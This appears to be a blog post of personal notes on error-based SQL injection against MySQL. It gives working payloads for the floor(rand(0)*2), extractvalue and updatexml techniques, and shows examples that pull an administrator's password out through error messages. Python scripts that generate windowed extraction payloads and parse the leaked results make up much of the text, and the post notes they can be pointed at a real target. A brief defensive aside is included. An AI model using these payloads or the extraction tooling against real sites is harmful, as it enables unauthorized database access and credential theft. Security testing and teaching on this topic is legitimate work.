Posting some old notes. When a statement fails, MySQL raises an error message, and PHP+MySQL sites often print that error text straight onto the page, so the following three methods can be used to pull specific data out of the database through the error message. (All three assume the error text is visible to the client; on the application side the fix is to stop echoing database errors to the user and to use parameterized queries.)

Actual test environment:

mysql> show tables;
+----------------+
| Tables_in_test |
+----------------+
| admin          |
| article        |
+----------------+

mysql> describe admin;
+-------+------------------+------+-----+---------+----------------+
| Field | Type             | Null | Key | Default | Extra          |
+-------+------------------+------+-----+---------+----------------+
| id    | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| user  | varchar(50)      | NO   |     | NULL    |                |
| pass  | varchar(50)      | NO   |     | NULL    |                |
+-------+------------------+------+-----+---------+----------------+

mysql> describe article;
+---------+------------------+------+-----+---------+----------------+
| Field   | Type             | Null | Key | Default | Extra          |
+---------+------------------+------+-----+---------+----------------+
| id      | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| title   | varchar(50)      | NO   |     | NULL    |                |
| content | varchar(50)      | NO   |     | NULL    |                |
+---------+------------------+------+-----+---------+----------------+
1. Error via floor()

The following payloads can be used. Both rely on the same behaviour: when MySQL runs GROUP BY it keeps the groups in a temporary table keyed by the grouping expression, evaluates the key once to look the group up and evaluates it again when a new group row is inserted. With floor(rand(0)*2) in the key the values of the fixed-seed sequence (0, 1, 1, 0, 1, 1, ...) make that second evaluation collide with an existing group on the third input row, and the whole key, including the data we smuggled into it, comes back in the "Duplicate entry" error. Two things matter: the seed (plain rand() is nondeterministic and the error is not guaranteed) and having at least three rows to group over, which is why the second payload unions together exactly three rows instead of reading information_schema.tables.

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));
Example:

First run the normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+
If the id parameter is injectable, the following statement triggers the error:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

The MySQL version has been leaked in the error. Note that the trailing 1 is the floor(rand(0)*2) value that was appended to the key, not part of the data. To extract other data, replace version() with any other expression or scalar subquery. For example, to get the administrator's username and password (the examples below pull the pass column; swap in user for the username):

Method1:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method2:

mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

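To show why the trick needs rand(0) and at least three rows, here is an added Python model (my own code, not part of the original notes) that reproduces MySQL's RAND(N) generator and the GROUP BY temporary-table behaviour described above: the key expression is evaluated once for the lookup and again when the group row is inserted. The generator constants are MySQL's (seed1 = N*0x10001 + 55555555, seed2 = N*0x10000001, my_rnd() modulus 0x3FFFFFFF); the group-by part is a simplified model of the server, and the function names are mine.

```python
import math

MAX_VALUE = 0x3FFFFFFF  # modulus used by MySQL's my_rnd()


class MySQLRand:
    """Reproduce MySQL's RAND(N) with a constant seed (seeded once per statement)."""

    def __init__(self, seed):
        # Seeding rule from sql/item_func.cc: seed1 = N*0x10001+55555555, seed2 = N*0x10000001
        self.seed1 = ((seed * 0x10001 + 55555555) & 0xFFFFFFFF) % MAX_VALUE
        self.seed2 = ((seed * 0x10000001) & 0xFFFFFFFF) % MAX_VALUE

    def next(self):
        # mysys my_rnd(): two-seed linear congruential step, result in [0, 1)
        self.seed1 = (self.seed1 * 3 + self.seed2) % MAX_VALUE
        self.seed2 = (self.seed1 + self.seed2 + 33) % MAX_VALUE
        return self.seed1 / MAX_VALUE


def floor_rand_sequence(seed=0, count=8):
    """Per-row values of floor(rand(seed)*2); for seed 0 they start 0,1,1,0,1,1,0,0,..."""
    rnd = MySQLRand(seed)
    return [math.floor(rnd.next() * 2) for _ in range(count)]


class DuplicateEntry(Exception):
    """Stands in for MySQL's ERROR 1062 (23000)."""


def simulate_group_by(prefix, rows, seed=0):
    """Simplified model of GROUP BY concat(prefix, floor(rand(seed)*2)) over `rows` input rows.

    The groups live in a temporary table keyed by the GROUP BY expression. For each
    input row the key is evaluated to look the group up; if the group is new, the key
    is evaluated AGAIN when the group row is inserted. With rand(0) that second value
    can already be present, which violates the temp table's unique key.
    """
    rnd = MySQLRand(seed)
    groups = {}
    for _ in range(rows):
        key = prefix + str(math.floor(rnd.next() * 2))  # evaluation 1: lookup
        if key in groups:
            groups[key] += 1
            continue
        key = prefix + str(math.floor(rnd.next() * 2))  # evaluation 2: insert
        if key in groups:
            raise DuplicateEntry(
                f"ERROR 1062 (23000): Duplicate entry '{key}' for key 'group_key'"
            )
        groups[key] = 1
    return groups


def leaked_error(prefix, rows, seed=0):
    """Return the error text the attacker would see, or None if the query succeeds."""
    try:
        simulate_group_by(prefix, rows, seed)
    except DuplicateEntry as exc:
        return str(exc)
    return None


if __name__ == "__main__":
    print(floor_rand_sequence(0, 6))                 # [0, 1, 1, 0, 1, 1]
    print(leaked_error("5.1.33-community-log", 2))  # None: two rows never collide
    print(leaked_error("5.1.33-community-log", 3))  # the error from the notes above
```

Walking through the three rows: row 1 looks up key ...0, finds nothing and inserts ...1; row 2 looks up ...1 and finds it; row 3 looks up ...0, finds nothing, re-evaluates to ...1 on insert and hits the unique key. With only two rows, or with an unseeded rand(), there is no guaranteed collision.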
2. ExtractValue

Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

0x5c is a backslash. Prepending it makes sure the second argument is not valid XPath, so extractvalue() raises a syntax error that echoes the string (a bare value such as admin888 may well be legal XPath and produce no error at all). Keep in mind that the error shows at most 32 characters of the string, delimiter included, so longer values have to be read out in pieces with substr().

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c, (select pass from admin limit 1)));--
ERROR 1105 (HY000): XPATH syntax error: '\admin888'
3. UpdateXml

Test statement:

and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))

This works the same way as extractvalue(): 0x5e24 is the two characters ^$, which wrap the value so that the XPath expression is invalid and the whole string is echoed in the error. The same 32-character cap on the echoed string applies.

Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,(select pass from admin limit 1),0x5e24),1));
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
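Both XPath methods above (sections 2 and 3) run into the same practical limit that the short admin888 example hides: the error message shows at most 32 characters of the offending string, so anything longer has to be fetched in windows with substr(). As an added example (my own code, not from the original notes), here is a small Python helper that builds the windowed payloads in both styles (0x5c with extractvalue, 0x5e24 with updatexml), parses the leaked chunk out of the error text, and drives the loop against a constructed stand-in for the server so it runs offline. The stand-in, the sample values and the function names are mine; the 32-character cap and the error text format are MySQL's.

```python
import re

XPATH_ERROR_LIMIT = 32  # MySQL echoes at most this many chars of the bad XPath string

# hex literal used in the payload -> (text it becomes in the error, whether the
# payload style puts it on both sides of the value). 0x5c is the extractvalue style
# from the notes, 0x5e24 the updatexml style.
DELIMS = {"0x5c": ("\\", False), "0x5e24": ("^$", True)}


def window_size(delim_hex):
    """Data characters per request: the cap minus every delimiter copy that must fit."""
    delim, wrapped = DELIMS[delim_hex]
    return XPATH_ERROR_LIMIT - len(delim) * (2 if wrapped else 1)


def xpath_payloads(subquery, delim_hex="0x5c", max_len=96):
    """Build error-based payloads that page through a value with substr().

    extractvalue() is used for the 0x5c style and updatexml() for the 0x5e24 style,
    matching the two forms in the notes; both raise the same XPATH syntax error.
    """
    _, wrapped = DELIMS[delim_hex]
    window = window_size(delim_hex)
    payloads = []
    for start in range(1, max_len + 1, window):  # substr() offsets are 1-based
        piece = f"substr(({subquery}),{start},{window})"
        if wrapped:
            payloads.append(f"and 1=(updatexml(1,concat({delim_hex},{piece},{delim_hex}),1))")
        else:
            payloads.append(f"and extractvalue(1, concat({delim_hex}, {piece}))")
    return payloads


ERROR_RE = re.compile(r"XPATH syntax error: '(.*)'$")


def parse_xpath_error(error_text, delim_hex="0x5c"):
    """Pull the leaked chunk out of "ERROR 1105 (HY000): XPATH syntax error: '...'".

    Returns None when the text is not an XPath error carrying our delimiter (for
    instance the subquery returned NULL, so concat() was NULL and nothing errored),
    and "" when the window was empty, i.e. substr() ran past the end of the value.
    """
    match = ERROR_RE.search(error_text)
    if not match:
        return None
    delim, wrapped = DELIMS[delim_hex]
    body = match.group(1)
    if not body.startswith(delim):
        return None
    body = body[len(delim):]
    if wrapped:
        if not body.endswith(delim):
            return None
        body = body[: -len(delim)]
    return body


def fake_mysql_error(secret, delim_hex, start, length):
    """Constructed stand-in for the server: the error text MySQL would produce for
    concat(delim, substr(secret, start, length)[, delim]) under the 32-char cap."""
    delim, wrapped = DELIMS[delim_hex]
    chunk = secret[start - 1 : start - 1 + length]
    bad_xpath = delim + chunk + (delim if wrapped else "")
    return f"ERROR 1105 (HY000): XPATH syntax error: '{bad_xpath[:XPATH_ERROR_LIMIT]}'"


def dump_value(secret, delim_hex="0x5c"):
    """Run the windowed loop against the stand-in and reassemble the full value."""
    window = window_size(delim_hex)
    recovered, start = "", 1
    while True:
        error = fake_mysql_error(secret, delim_hex, start, window)
        chunk = parse_xpath_error(error, delim_hex)
        if not chunk:            # None (no usable error) or "" (ran off the end)
            break
        recovered += chunk
        if len(chunk) < window:  # a short window means this was the last piece
            break
        start += window
    return recovered


if __name__ == "__main__":
    for p in xpath_payloads("select pass from admin limit 1", max_len=62):
        print(p)
    print(dump_value("admin888"))  # admin888, one request is enough
    print(dump_value("x" * 70))    # three requests of 31, 31 and 8 characters
```

Against a real target the fake_mysql_error() call is replaced by sending each payload and reading the error text back from the page; the parsing and reassembly stay the same. Because updatexml payloads carry the delimiter on both sides, they only get 28 characters of data per request against the 31 of the extractvalue style.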
That's all. Thanks to the foreign guys.